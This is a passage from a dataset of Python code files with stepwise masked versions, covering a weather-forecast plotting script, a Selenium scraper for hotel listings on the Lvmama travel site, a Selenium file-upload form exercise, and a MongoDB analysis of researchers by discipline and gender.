"step-3": "<mask token>\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-4": "<mask token>\nimport matplotlib.pyplot as plt\nimport iris.plot as iplt\nfrom irise import convert\nfrom irise.plot.util import add_map\nfrom myscripts import plotdir\nfrom myscripts.models.um import case_studies\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-5": "\"\"\"Produce a multi-panel figure of each output lead time in a forecast\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport iris.plot as iplt\nfrom irise import convert\nfrom irise.plot.util import add_map\nfrom myscripts import plotdir\nfrom myscripts.models.um import case_studies\n\ncolumns = 3\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = (nt / columns) + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) +\n '_' + str(levels[1][0]) + '.png')\n\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = ('air_potential_temperature', [320])\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding:utf-8 -*-
from spider.driver.spider.base.spider import *
class LvmamaHotelSpider(Spider):
def get_comment_info2(self,shop_data):
params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)
comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)
while(True):
comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector)
if comments_list_len < comment_len*0.7:
self.driver.refresh()
time.sleep(0.5)
else:
break
self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)
try:
for each in self.until_presence_of_all_elements_located_by_css_selector(
css_selector=params_list_comment1.list_css_selector+' > div.arrow'):
self.until_click_by_vertical_scroll_page_down(click_ele=each)
except Exception as e:
self.error_log(e=e)
#上面在下拉加载页面
external_key={
FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)
def get_comment_info(self):
for shop_data in self.get_current_data_list_from_db(self.shops):
url = shop_data.get(FieldName.COMMENT_URL)
if url:
self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)
def get_shop_info(self):
self.info_log(data='进入驴妈妈移动版主页...')
self.driver.get('https://m.lvmama.com')
time.sleep(1.5)
self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')
time.sleep(1)
self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)
self.info_log(data='输入%s...'%self.data_region)
self.until_send_enter_by_css_selector(css_selector='#keyword')
self.info_log(data='搜索%s...'%self.data_region)
time.sleep(1)
self.until_click_by_css_selector(css_selector='#tab_hotel > a')
self.info_log(data='点击%s...'%self.data_source)
time.sleep(3)
params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)
self.until_ismore_by_send_key_arrow_down_judge_by_len(
list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',
min_frequency=100,max_frequency=500,timeout=1)
self.info_log(data='shopinfo')
params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # 获取爬虫数据列表的样式信息
shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)
params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)
shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,
url_name=FieldName.SHOP_URL,pause_time=1)
for shop_data in shop_data_list:
key = {
FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),
FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),
FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),
}
self.save_data_to_db(target=self.shops,key=key,data=shop_data)
def run_spider(self):
self.get_shop_info()
# self.get_comment_info()
|
normal
|
{
"blob_id": "931e73ffce6d24dbfb92501670245e20fc403a7a",
"index": 7969,
"step-1": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n <mask token>\n <mask token>\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-2": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n <mask token>\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-3": "<mask token>\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2, url=url,\n shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-4": "from spider.driver.spider.base.spider import *\n\n\nclass LvmamaHotelSpider(Spider):\n\n def get_comment_info2(self, shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while True:\n comments_list_len = (self.\n until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector))\n if comments_list_len < comment_len * 0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=\n params_list_comment1.list_css_selector, comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector +\n ' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n external_key = {FieldName.SHOP_URL: shop_data.get(FieldName.\n SHOP_URL), FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.get_spider_data_list(params_list=params_list_comment1, is_save\n =True, external_key=external_key, target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2, url=url,\n shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector=\n '#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword', text=\n self.data_region)\n self.info_log(data='输入%s...' % self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...' % self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...' % self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(list_css_selector\n =params_list_shop1.list_css_selector, ele_css_selector=\n '#tab_hotel > a', min_frequency=100, max_frequency=500, timeout=1)\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n shop_data_list = self.get_spider_data_list(params_list=\n params_list_shop1, end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=\n shop_data_list, isnewtab=True, params=params_shop2, url_name=\n FieldName.SHOP_URL, pause_time=1)\n for shop_data in shop_data_list:\n key = {FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME: shop_data.get(FieldName.SHOP_NAME)}\n self.save_data_to_db(target=self.shops, key=key, data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n",
"step-5": "# -*- coding:utf-8 -*-\nfrom spider.driver.spider.base.spider import *\n\nclass LvmamaHotelSpider(Spider):\n def get_comment_info2(self,shop_data):\n params_list_comment1 = self.params_dict.get(ParamType.COMMENT_INFO_1)\n comment_len = shop_data.get(FieldName.SHOP_COMMENT_NUM)\n while(True):\n comments_list_len = self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector)\n if comments_list_len < comment_len*0.7:\n self.driver.refresh()\n time.sleep(0.5)\n else:\n break\n self.ismore_by_scroll_page_judge_by_len(css_selector=params_list_comment1.list_css_selector,comment_len=comment_len)\n try:\n for each in self.until_presence_of_all_elements_located_by_css_selector(\n css_selector=params_list_comment1.list_css_selector+' > div.arrow'):\n self.until_click_by_vertical_scroll_page_down(click_ele=each)\n except Exception as e:\n self.error_log(e=e)\n #上面在下拉加载页面\n external_key={\n FieldName.SHOP_URL : shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID : shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),\n }\n self.get_spider_data_list(params_list=params_list_comment1,is_save=True,external_key=external_key,target=self.comments)\n\n def get_comment_info(self):\n for shop_data in self.get_current_data_list_from_db(self.shops):\n url = shop_data.get(FieldName.COMMENT_URL)\n if url:\n self.run_new_tab_task(func=self.get_comment_info2,url=url,shop_data=shop_data)\n\n def get_shop_info(self):\n self.info_log(data='进入驴妈妈移动版主页...')\n self.driver.get('https://m.lvmama.com')\n time.sleep(1.5)\n self.until_click_by_css_selector(css_selector='#content > div.index-header > a.search.cmAddClick > p')\n time.sleep(1)\n self.until_send_text_by_css_selector(css_selector='#keyword',text=self.data_region)\n self.info_log(data='输入%s...'%self.data_region)\n self.until_send_enter_by_css_selector(css_selector='#keyword')\n self.info_log(data='搜索%s...'%self.data_region)\n time.sleep(1)\n self.until_click_by_css_selector(css_selector='#tab_hotel > a')\n self.info_log(data='点击%s...'%self.data_source)\n time.sleep(3)\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1)\n self.until_ismore_by_send_key_arrow_down_judge_by_len(\n list_css_selector=params_list_shop1.list_css_selector,ele_css_selector='#tab_hotel > a',\n min_frequency=100,max_frequency=500,timeout=1)\n\n self.info_log(data='shopinfo')\n params_list_shop1 = self.params_dict.get(ParamType.SHOP_INFO_1) # 获取爬虫数据列表的样式信息\n shop_data_list = self.get_spider_data_list(params_list=params_list_shop1,end=18)\n params_shop2 = self.params_dict.get(ParamType.SHOP_INFO_2)\n shop_data_list = self.add_spider_data_to_data_list(data_list=shop_data_list, isnewtab=True, params=params_shop2,\n url_name=FieldName.SHOP_URL,pause_time=1)\n for shop_data in shop_data_list:\n key = {\n FieldName.SHOP_URL: shop_data.get(FieldName.SHOP_URL),\n FieldName.SHOP_ID: shop_data.get(FieldName.SHOP_ID),\n FieldName.SHOP_NAME : shop_data.get(FieldName.SHOP_NAME),\n }\n self.save_data_to_db(target=self.shops,key=key,data=shop_data)\n\n def run_spider(self):\n self.get_shop_info()\n # self.get_comment_info()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
/usr/local/python-3.6/lib/python3.6/abc.py
|
normal
|
{
"blob_id": "32d830f00a9d33b8f7f438c14b522ef186001bf3",
"index": 9392,
"step-1": "/usr/local/python-3.6/lib/python3.6/abc.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import time
from selenium import webdriver
import os
from selenium.webdriver.common.by import By
with open("file.txt", "w") as file:
content = file.write("Tanyuhich")
try:
browser = webdriver.Chrome()
browser.get("http://suninjuly.github.io/file_input.html")
input1 = browser.find_element_by_name('firstname')
input1.send_keys("Ivan")
input2 = browser.find_element_by_name('lastname')
input2.send_keys("Petrov")
input3 = browser.find_element_by_name('email')
input3.send_keys("[email protected]")
current_dir = os.path.abspath(os.path.dirname(__file__))
path = os.getcwd() + '/' + file.name
element = browser.find_element(By.CSS_SELECTOR, "[type='file']")
element.send_keys(path)
button = browser.find_element_by_css_selector("button.btn")
button.click()
finally:
# успеваем скопировать код за 30 секунд
time.sleep(30)
# закрываем браузер после всех манипуляций
browser.quit()
# не забываем оставить пустую строку в конце файла
|
normal
|
{
"blob_id": "03270285c6dc99d8dcb9804270421f36b573048c",
"index": 2863,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('file.txt', 'w') as file:\n content = file.write('Tanyuhich')\ntry:\n browser = webdriver.Chrome()\n browser.get('http://suninjuly.github.io/file_input.html')\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys('Ivan')\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys('Petrov')\n input3 = browser.find_element_by_name('email')\n input3.send_keys('[email protected]')\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector('button.btn')\n button.click()\nfinally:\n time.sleep(30)\n browser.quit()\n",
"step-3": "import time\nfrom selenium import webdriver\nimport os\nfrom selenium.webdriver.common.by import By\nwith open('file.txt', 'w') as file:\n content = file.write('Tanyuhich')\ntry:\n browser = webdriver.Chrome()\n browser.get('http://suninjuly.github.io/file_input.html')\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys('Ivan')\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys('Petrov')\n input3 = browser.find_element_by_name('email')\n input3.send_keys('[email protected]')\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector('button.btn')\n button.click()\nfinally:\n time.sleep(30)\n browser.quit()\n",
"step-4": "import time\nfrom selenium import webdriver\nimport os\nfrom selenium.webdriver.common.by import By\n\nwith open(\"file.txt\", \"w\") as file:\n content = file.write(\"Tanyuhich\")\n \ntry:\n browser = webdriver.Chrome()\n browser.get(\"http://suninjuly.github.io/file_input.html\")\n input1 = browser.find_element_by_name('firstname')\n input1.send_keys(\"Ivan\")\n input2 = browser.find_element_by_name('lastname')\n input2.send_keys(\"Petrov\")\n input3 = browser.find_element_by_name('email')\n input3.send_keys(\"[email protected]\")\n current_dir = os.path.abspath(os.path.dirname(__file__))\n path = os.getcwd() + '/' + file.name\n element = browser.find_element(By.CSS_SELECTOR, \"[type='file']\")\n element.send_keys(path)\n button = browser.find_element_by_css_selector(\"button.btn\")\n button.click()\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(30)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import DB as db
import os
from Chart import Chart
import matplotlib.pyplot as plt
import numpy as np
table = db.get_researcher_copy()
chart_path = '../charts/discipline '
def get_discipline_with_more_female():
docs = table.aggregate([
{'$match':{'gender':{'$exists':1}}},
{'$unwind':'$labels'},
{'$group':{'_id':{'label':'$labels','gender':'$gender'},'count':{'$sum':1}}}
# {'$group':{'_id':{'label':'$labels'},'male_count':{'$sum':{'$match':{'gender':'M'}}}}}
])
d = {}
for doc in docs:
if doc['_id']['label'] in d:
if doc['_id']['gender'] == 'M':
d[doc['_id']['label']][0] = doc['count']
else:
d[doc['_id']['label']][1] = doc['count']
else:
d[doc['_id']['label']] = [0,0]
if doc['_id']['gender'] == 'M':
d[doc['_id']['label']][0] = doc['count']
else:
d[doc['_id']['label']][1] = doc['count']
count = 0
for key in d:
if d[key][0]!=0 and d[key][1] > d[key][0]:
count+=1
print('%s:'%key)
print('male {0},female {1}'.format(d[key][0],d[key][1]))
print('number of all:%s'%count)
def discipline_proportion(top_k):
docs = table.aggregate([
{'$match':{'gender':{'$exists':1}}},
{'$unwind':'$labels'},
{'$group':{
'_id':{'label':'$labels'},
'count':{'$sum':1}
}},
{'$sort':{'count':-1}}])
docs = [doc for doc in docs]
# print(docs[:10])
total = table.count({'gender':{'$exists':1}})
count_arr = [doc['count'] for doc in docs[:top_k]]
proportion_arr = [doc['count']/total for doc in docs[:top_k]]
cumulative_arr = []
c = 0
for i in proportion_arr:
c+=i
cumulative_arr.append(c)
labels = [doc['_id']['label'] for doc in docs[:top_k]]
# chart = Chart()
# print(len(labels))
# print(len(arr))
# chart.pie([arr],'test',labels)
# chart.show()
# chart.single_unnomarlized_CDF(arr,'disciplines CDF','disciplines','percentage')
# chart.save(chart_path+'cdf.eps')
# s = ''
# print(np.median())
# for label in labels:
# s = s+label+', '
# print(s)
# os.mkdir(chart_path) if not os.path.exists(chart_path) else ''
chart = Chart(100,150)
# chart.bar(count_arr,top_k,labels,'The Top {0} popular disciplines'.format(top_k),'discipline','researcher number',True,log=False,fontsize=100)
# chart.show()
# chart.save(chart_path+'/number_{0}'.format(top_k),format='eps')
# chart.clear()
chart.bar(cumulative_arr,top_k,labels,'Cumulative propotion of most popular disciplines','discipline','propotion',True,log=False,fontsize=100)
chart.save(chart_path+'/cumulative_{0}'.format(top_k),format='eps')
chart.clear()
# chart = Chart(100,150)
# chart.bar(proportion_arr,top_k,labels,'The propotion of researchers in top 30 disciplines','discipline','propotion',True,log=False,fontsize=100)
# chart.save(chart_path+'/proportion_{0}.eps'.format(top_k))
# chart.clear()
def gender_favorite(top_k,sex='M'):
docs = table.aggregate([
{'$match':{'gender':sex}},
{'$unwind':'$labels'},
{'$group':{
'_id':{'label':'$labels'},
'count':{'$sum':1}
}},
{'$sort':{'count':-1}}])
number_arr = []
count_arr = []
labels = []
docs = [doc for doc in docs]
for doc in docs[:top_k]:
count_arr.append(doc['count'])
labels.append(doc['_id']['label'])
chart = Chart(100,180)
chart.bar(count_arr,top_k,labels,"The Top {0} females' favorite disciplines".format(top_k),'discipline','researcher number',True,log=False,fontsize=120)
chart.save(chart_path+'/{1}_favorite_{0}'.format(top_k,sex),format='eps')
chart.clear()
def average_h_index(top_k):
all_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'index':1,'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])
d = {}
col_d = {}
for doc in all_docs:
for label in doc['labels']:
if label in d:
if doc['gender'] == 'M':
d[label][0]+=1
d[label][1]+=int(doc['index'])
else:
d[label][2]+=1
d[label][3]+=int(doc['index'])
else:
if doc['gender'] == 'M':
d[label] = [1,int(doc['index']),0,0]
else:
d[label] = [0,0,1,int(doc['index'])]
if label in d:
if doc['gender'] == 'M':
d[label][0]+=1
d[label][1]+=int(doc['index'])
else:
d[label][2]+=1
d[label][3]+=int(doc['index'])
else:
if doc['gender'] == 'M':
d[label] = [1,int(doc['index']),0,0]
else:
d[label] = [0,0,1,int(doc['index'])]
labels = []
arr = []
for key in d:
if d[key][0] > 50:
a = d[key][1]/d[key][0]
b = d[key][3]/d[key][2]
if b>a:
print(key)
print(a)
print(b)
def avarage_publication(top_k):
all_docs = copy.aggregate([{'$match':{'gender':{'$exists':True}}},{'$project':{'labels':1,'gender':1,'count':{'$size':'$pubs'}}}])
d = {}
for doc in docs:
for label in doc['labels']:
if label in d:
d[pub['label']] = d[pub['label']]+1
# arr.sort(key=lambda x:x[2],reverse=True)
# arr = arr[:top_k]
# average_index_arr = []
# labels = []
# for item in arr:
# labels.append(item[0])
# average_index_arr.append(item[1])
# chart = Chart(100,180)
# chart.bar(average_index_arr,top_k,labels,'The Top {0} fields with highest average h-index'.format(top_k),'discipline','researcher number',True,log=False,fontsize=120)
# chart.save(chart_path+'/top_{0}_average_disciplines'.format(top_k),format='png')
# chart.clear()
discipline_proportion(30)
# get_discipline_with_more_female()
# gender_favorite(30)
# gender_favorite(30,'F')
|
normal
|
{
"blob_id": "c585b1439217fff42945eeb9e02512d73f8ba19f",
"index": 5805,
"step-1": "<mask token>\n\n\ndef get_discipline_with_more_female():\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels',\n 'gender': '$gender'}, 'count': {'$sum': 1}}}])\n d = {}\n for doc in docs:\n if doc['_id']['label'] in d:\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n else:\n d[doc['_id']['label']] = [0, 0]\n if doc['_id']['gender'] == 'M':\n d[doc['_id']['label']][0] = doc['count']\n else:\n d[doc['_id']['label']][1] = doc['count']\n count = 0\n for key in d:\n if d[key][0] != 0 and d[key][1] > d[key][0]:\n count += 1\n print('%s:' % key)\n print('male {0},female {1}'.format(d[key][0], d[key][1]))\n print('number of all:%s' % count)\n\n\ndef discipline_proportion(top_k):\n docs = table.aggregate([{'$match': {'gender': {'$exists': 1}}}, {\n '$unwind': '$labels'}, {'$group': {'_id': {'label': '$labels'},\n 'count': {'$sum': 1}}}, {'$sort': {'count': -1}}])\n docs = [doc for doc in docs]\n total = table.count({'gender': {'$exists': 1}})\n count_arr = [doc['count'] for doc in docs[:top_k]]\n proportion_arr = [(doc['count'] / total) for doc in docs[:top_k]]\n cumulative_arr = []\n c = 0\n for i in proportion_arr:\n c += i\n cumulative_arr.append(c)\n labels = [doc['_id']['label'] for doc in docs[:top_k]]\n chart = Chart(100, 150)\n 